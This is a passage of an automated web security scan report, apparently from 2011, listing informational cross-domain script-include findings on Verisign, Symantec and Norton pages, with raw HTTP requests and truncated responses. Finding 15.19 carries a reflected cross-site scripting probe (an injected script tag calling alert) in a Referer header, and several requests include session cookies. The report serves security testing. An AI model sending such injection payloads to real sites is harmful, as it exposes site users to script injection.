Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/ssl-certificates-support/index.html
Issue detail
The response dynamically includes the following script from another domain: https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/trust-seal-support/index.html
Issue detail
The response dynamically includes the following script from another domain: https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.14. http://query.verisign.ch/search
Summary
Severity: Information
Confidence: Certain
Host: http://query.verisign.ch
Path: /search
Issue detail
The response dynamically includes the following scripts from other domains:
http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
https://seal.verisign.com/getseal?host_name=query.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... </script> <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=query.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </div> <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/shared.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="//cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]...
15.15. https://securitycenter.verisign.com/celp/enroll/outsideSearch
Summary
Severity: Information
Confidence: Certain
Host: https://securitycenter.verisign.com
Path: /celp/enroll/outsideSearch
Issue detail
The response dynamically includes the following script from another domain: https://ssl.google-analytics.com/urchin.js
Request
GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/ Connection: close <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <title> Search for SSL or Code Signing Certificates from VeriSig...[SNIP]... <body aLink=#000000 bgColor=#ffffff class=bgWht leftMargin=0 link=#000000 topMargin=0 vLink=#000000 marginheight="0" marginwidth="0" onLoad="focus()"><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>...[SNIP]...
15.16. https://ssl-certificate-center.verisign.ch/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.ch
Path: /process/retail/console_login
Issue detail
The response dynamically includes the following scripts from other domains:
https://ssl.google-analytics.com/urchin.js
https://www.verisign.com/js/mbox.js
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"> </script>...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.17. https://ssl-certificate-center.verisign.com/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.com
Path: /process/retail/console_login
Issue detail
The response dynamically includes the following script from another domain: https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:43 GMT Server: Apache Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.18. http://store.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: http://store.symantec.com
Path: /
Issue detail
The response dynamically includes the following scripts from other domains:
http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js
http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js
http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js
Request
GET /?inid=us_pagenotfound_smb_store HTTP/1.1 Host: store.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:30:57 GMT Content-Length: 18197 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <!-- ...[SNIP]... <!-- Microsoft CDN Script References --> <script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js" type="text/javascript"> </script> <script src="http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js" type="text/javascript"> </script>...[SNIP]... <!-- Microsoft CDN Script References --> <script src="http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js" type="text/javascript"> </script>...[SNIP]...
15.19. https://symantec-corporation.com/servlet/campaignrespondent
Summary
Severity: Information
Confidence: Certain
Host: https://symantec-corporation.com
Path: /servlet/campaignrespondent
Issue detail
The response dynamically includes the following scripts from other domains:
https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=
https://www-secure.symantec.com/script/20080114/swfobject.js
https://www-secure.symantec.com/script/omniture/om_code.js
https://www-secure.symantec.com/script/omniture/s_code.js
https://www-secure.symantec.com/scripts/icrossing/i2a.js
https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js
Request
GET /servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 HTTP/1.1 Host: symantec-corporation.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:30 GMT P3P: policyref="http://policy.responsys.net/w3c/response.xml", CP="NON DSP COR IVAi IVDi OTRi IND ONL" Pragma: no-cache Cache-Control: no-cache, private Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 36800 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Symantec Enterprise Sales Contact Center</title> <meta content="veritasnonconsumer" name="om.environment"...[SNIP]... <link rel="stylesheet" href="https://www-secure.symantec.com/css/20081218/business.css" /><script src="https://www-secure.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </script><script src="https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js" language="javascript" type="text/javascript"> </script><script src="https://www-secure.symantec.com/script/20080114/swfobject.js" language="javascript" type="text/javascript"> </script><script src="https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=" language="javascript" type="text/javascript"> </script>...[SNIP]... <!-- i2a tracking code--><script type="text/javascript" src="https://www-secure.symantec.com/scripts/icrossing/i2a.js"> </script>...[SNIP]... </p> <script src="https://www-secure.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]...
15.20. https://trust-center.verisign.ch/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.ch
Path: /process/retail/console_login
Issue detail
The response dynamically includes the following scripts from other domains:
https://ssl.google-analytics.com/urchin.js
https://www.verisign.com/js/mbox.js
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"> </script>...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.21. https://trust-center.verisign.com/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/console_login
Issue detail
The response dynamically includes the following script from another domain: https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: Apache Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.22. https://trust-center.verisign.com/process/retail/help_and_support
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/help_and_support
Issue detail
The response dynamically includes the following script from another domain: https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/help_and_support HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:53 GMT Server: Apache Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 138732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.23. https://trust-center.verisign.com/process/retail/trust_product_selector
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/trust_product_selector
Issue detail
The response dynamically includes the following script from another domain: https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]... </script> <script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.24. http://us.norton.com/360
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /360
Issue detail
The response dynamically includes the following script from another domain: http://www.googleadservices.com/pagead/conversion.js
Request
GET /360 HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=679 Date: Fri, 09 Sep 2011 21:47:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107429 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Firewall - Anti Virus - Phishing Protection | Norton 360</title> <meta http-...[SNIP]... </script> <script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"> </script>...[SNIP]...
15.25. http://us.norton.com/downloads/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /downloads/index.jsp
Issue detail
The response dynamically includes the following script from another domain: http://www.googleadservices.com/pagead/conversion.js
Request
GET /downloads/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=3256 Date: Fri, 09 Sep 2011 21:47:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 53856 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Download Norton Internet Security, Antivirus or Norton 360</title> <meta http-equiv="Content-Type" content="text/ht...[SNIP]... </script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.26. http://us.norton.com/familyresources/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /familyresources/index.jsp
Issue detail
The response dynamically includes the following script from another domain: http://www.symantec.com/script/20070727/windowShade.js
Request
GET /familyresources/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=64 Date: Fri, 09 Sep 2011 21:47:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67586 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Family Resource Center: Internet Safety for Children, Teens &amp; Adults...[SNIP]... </div><script src="http://www.symantec.com/script/20070727/windowShade.js" language="javascript" type="text/javascript"> </script>...[SNIP]...
15.27. http://us.norton.com/nortonlive/
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /nortonlive/
Issue detail
The response dynamically includes the following script from another domain: http://marchex.voicestar.com/euinc/number-changer.js
Request
GET /nortonlive/ HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Cache-Control: public, max-age=3479 Date: Fri, 09 Sep 2011 21:47:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39789 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Computer Support & Computer Tech Support | NortonLive</title> <meta http...[SNIP]... </script> <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js"> </script>...[SNIP]...
15.28. http://us.norton.com/nortonlive/spyware-virus-removal.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /nortonlive/spyware-virus-removal.jsp
Issue detail
The response dynamically includes the following script from another domain: http://marchex.voicestar.com/euinc/number-changer.js
Request
GET /nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Cache-Control: public, max-age=3123 Date: Fri, 09 Sep 2011 21:47:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36294 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Virus Removal & Malware Removal Service | NortonLive</title> <meta http-...[SNIP]... </script> <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js"> </script>...[SNIP]...
15.29. http://us.norton.com/products/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /products/index.jsp
Issue detail
The response dynamically includes the following script from another domain: http://www.googleadservices.com/pagead/conversion.js
Request
GET /products/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1696 Date: Fri, 09 Sep 2011 21:47:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40963 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Protect your computer and remove adware and spyware with Norton 360</title> <meta http-equiv="Content-Type" content...[SNIP]... </script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.30. http://us.norton.com/security_response/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /security_response/index.jsp
Issue detail
The response dynamically includes the following script from another domain: http://admin.brightcove.com/js/BrightcoveExperiences.js
Request
GET /security_response/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1815 Date: Fri, 09 Sep 2011 21:47:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67812 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Viruses and Risks - Exploits - Virus Protection | Security Response</title>...[SNIP]... </div> <script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript"> </script>...[SNIP]...
15.31. http://www.symantec.com/connect/
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /connect/
Issue detail
The response dynamically includes the following script from another domain: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Request
GET /connect/ HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
